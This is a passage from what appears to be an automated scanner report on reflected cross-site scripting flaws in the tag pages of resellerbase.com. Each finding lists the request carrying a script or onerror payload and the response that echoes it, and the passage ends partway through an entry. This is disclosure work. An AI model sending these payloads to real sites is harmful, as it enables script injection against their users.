Host:	http://www.resellerbase.com
Path:	/tag/cam

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 8460d<img%20src%3da%20onerror%3dalert(1)>00c271334fd was submitted in the REST URL parameter 2. This input was echoed as 8460d<img src=a onerror=alert(1)>00c271334fd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/cam8460d<img%20src%3da%20onerror%3dalert(1)>00c271334fd HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/31/camsense-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:58:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9784

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: cam84
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : cam8460d<img src=a onerror=alert(1)>00c271334fd]</td>
...[SNIP]...

2.4207. http://www.resellerbase.com/tag/cams [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/cams

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 4c459<script>alert(1)</script>967f8a74a30 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag4c459<script>alert(1)</script>967f8a74a30/cams HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:55:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag4c459<script>alert(1)</script>967f8a74a30/cams was not found on this server.</p>
...[SNIP]...

2.4208. http://www.resellerbase.com/tag/cams [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/cams

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload f0a2b</title><img%20src%3da%20onerror%3dalert(1)>3d80a16e4e6 was submitted in the REST URL parameter 2. This input was echoed as f0a2b</title><img src=a onerror=alert(1)>3d80a16e4e6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/camsf0a2b</title><img%20src%3da%20onerror%3dalert(1)>3d80a16e4e6 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:56:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9802

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: camsf0a2b</title><img src=a onerror=alert(1)>3d80a16e4e6</title>
...[SNIP]...

2.4209. http://www.resellerbase.com/tag/cams [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/cams

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 75672<img%20src%3da%20onerror%3dalert(1)>9fd8087c73b was submitted in the REST URL parameter 2. This input was echoed as 75672<img src=a onerror=alert(1)>9fd8087c73b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/cams75672<img%20src%3da%20onerror%3dalert(1)>9fd8087c73b HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:56:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9786

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: cams7
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : cams75672<img src=a onerror=alert(1)>9fd8087c73b]</td>
...[SNIP]...

2.4210. http://www.resellerbase.com/tag/cellular [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/cellular

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 53bc0<script>alert(1)</script>a348a8cbaa332323 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag53bc0<script>alert(1)</script>a348a8cbaa332323/cellular?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/cellular
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:58:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag53bc0<script>alert(1)</script>a348a8cbaa332323/cellular?sort_by=title&sort_order=asc was not found on this server.</p>
...[SNIP]...

2.4211. http://www.resellerbase.com/tag/cellular [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/cellular

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8f4f6<script>alert(1)</script>f241e83a3ee was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag8f4f6<script>alert(1)</script>f241e83a3ee/cellular HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/29/mediaplazza-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:57:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag8f4f6<script>alert(1)</script>f241e83a3ee/cellular was not found on this server.</p>
...[SNIP]...

2.4212. http://www.resellerbase.com/tag/cellular [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/cellular

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload abd9a</title><img%20src%3da%20onerror%3dalert(1)>403bb3f6bb4 was submitted in the REST URL parameter 2. This input was echoed as abd9a</title><img src=a onerror=alert(1)>403bb3f6bb4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/cellularabd9a</title><img%20src%3da%20onerror%3dalert(1)>403bb3f6bb4 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/29/mediaplazza-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:57:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9810

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: cellularabd9a</title><img src=a onerror=alert(1)>403bb3f6bb4</title>
...[SNIP]...

2.4213. http://www.resellerbase.com/tag/cellular [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/cellular

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload e5cd6</title><img%20src%3da%20onerror%3dalert(1)>7ffe369e170294cd0 was submitted in the REST URL parameter 2. This input was echoed as e5cd6</title><img src=a onerror=alert(1)>7ffe369e170294cd0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/cellulare5cd6</title><img%20src%3da%20onerror%3dalert(1)>7ffe369e170294cd0?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/cellular
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:58:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9822

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: cellulare5cd6</title><img src=a onerror=alert(1)>7ffe369e170294cd0</title>
...[SNIP]...

2.4214. http://www.resellerbase.com/tag/cellular [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/cellular

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload cd78b<img%20src%3da%20onerror%3dalert(1)>ea9ca491a5a was submitted in the REST URL parameter 2. This input was echoed as cd78b<img src=a onerror=alert(1)>ea9ca491a5a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/cellularcd78b<img%20src%3da%20onerror%3dalert(1)>ea9ca491a5a HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/29/mediaplazza-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:57:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9794

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: cellu
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : cellularcd78b<img src=a onerror=alert(1)>ea9ca491a5a]</td>
...[SNIP]...

2.4215. http://www.resellerbase.com/tag/cellular [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/cellular

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 1ab7d<img%20src%3da%20onerror%3dalert(1)>b70a306833ed709b1 was submitted in the REST URL parameter 2. This input was echoed as 1ab7d<img src=a onerror=alert(1)>b70a306833ed709b1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/cellular1ab7d<img%20src%3da%20onerror%3dalert(1)>b70a306833ed709b1?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/cellular
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:58:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9806

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: cellu
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : cellular1ab7d<img src=a onerror=alert(1)>b70a306833ed709b1]</td>
...[SNIP]...

2.4216. http://www.resellerbase.com/tag/chat [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/chat

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload eee88<script>alert(1)</script>788f62f85fedb649d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tageee88<script>alert(1)</script>788f62f85fedb649d/chat?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/chat
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:59:02 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tageee88<script>alert(1)</script>788f62f85fedb649d/chat?sort_by=title&sort_order=asc was not found on this server.</p>
...[SNIP]...

2.4217. http://www.resellerbase.com/tag/chat [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/chat

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 18526<script>alert(1)</script>5231ced6d97 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag18526<script>alert(1)</script>5231ced6d97/chat HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/37/neondollars-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:57:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag18526<script>alert(1)</script>5231ced6d97/chat was not found on this server.</p>
...[SNIP]...

2.4218. http://www.resellerbase.com/tag/chat [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/chat

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload b9b46</title><img%20src%3da%20onerror%3dalert(1)>e40eaaa0509957376 was submitted in the REST URL parameter 2. This input was echoed as b9b46</title><img src=a onerror=alert(1)>e40eaaa0509957376 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/chatb9b46</title><img%20src%3da%20onerror%3dalert(1)>e40eaaa0509957376?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/chat
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:59:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9814

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: chatb9b46</title><img src=a onerror=alert(1)>e40eaaa0509957376</title>
...[SNIP]...

2.4219. http://www.resellerbase.com/tag/chat [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/chat

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a2365<img%20src%3da%20onerror%3dalert(1)>80f3e464faa4312f5 was submitted in the REST URL parameter 2. This input was echoed as a2365<img src=a onerror=alert(1)>80f3e464faa4312f5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/chata2365<img%20src%3da%20onerror%3dalert(1)>80f3e464faa4312f5?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/chat
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:59:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9798

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: chata
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : chata2365<img src=a onerror=alert(1)>80f3e464faa4312f5]</td>
...[SNIP]...

2.4220. http://www.resellerbase.com/tag/chat [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/chat

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload f7f83<img%20src%3da%20onerror%3dalert(1)>2e876c53475 was submitted in the REST URL parameter 2. This input was echoed as f7f83<img src=a onerror=alert(1)>2e876c53475 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/chatf7f83<img%20src%3da%20onerror%3dalert(1)>2e876c53475 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/37/neondollars-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:58:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9786

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: chatf
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : chatf7f83<img src=a onerror=alert(1)>2e876c53475]</td>
...[SNIP]...

2.4221. http://www.resellerbase.com/tag/chat [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/chat

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload f452a</title><img%20src%3da%20onerror%3dalert(1)>62cfbf2461a was submitted in the REST URL parameter 2. This input was echoed as f452a</title><img src=a onerror=alert(1)>62cfbf2461a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/chatf452a</title><img%20src%3da%20onerror%3dalert(1)>62cfbf2461a HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/37/neondollars-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:58:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9802

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: chatf452a</title><img src=a onerror=alert(1)>62cfbf2461a</title>
...[SNIP]...

2.4222. http://www.resellerbase.com/tag/dating [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/dating

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 3d660<script>alert(1)</script>21dfa66dbefa5a4d5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag3d660<script>alert(1)</script>21dfa66dbefa5a4d5/dating?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/dating
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:57:13 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag3d660<script>alert(1)</script>21dfa66dbefa5a4d5/dating?sort_by=title&sort_order=asc was not found on this server.</p>
...[SNIP]...

2.4223. http://www.resellerbase.com/tag/dating [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/dating

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a584a<script>alert(1)</script>b39fcc11bcf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /taga584a<script>alert(1)</script>b39fcc11bcf/dating HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/14/datingrev-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:55:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

